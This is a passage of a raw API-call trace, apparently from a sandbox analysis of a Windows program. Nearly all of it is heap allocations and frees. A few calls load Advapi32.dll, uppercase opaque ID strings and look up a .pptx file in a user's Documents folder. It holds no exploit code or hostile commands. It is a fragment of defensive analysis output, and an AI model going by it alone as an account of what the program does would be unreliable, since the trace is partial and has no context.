(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0215.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0215.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0215.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.252] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Ax_c.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2107f870, ftCreationTime.dwHighDateTime=0x1d5bce9, ftLastAccessTime.dwLowDateTime=0x73686bb0, ftLastAccessTime.dwHighDateTime=0x1d5d46b, ftLastWriteTime.dwLowDateTime=0x73686bb0, ftLastWriteTime.dwHighDateTime=0x1d5d46b, nFileSizeHigh=0x0, nFileSizeLow=0x632a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ax_c.pptx", cAlternateFileName="AX_C~1.PPT")) returned 0x9e2138 [0215.252] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0215.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.254] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0215.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.255] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.255] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.255] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.255] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.255] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.256] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.256] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.257] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.258] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0215.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: 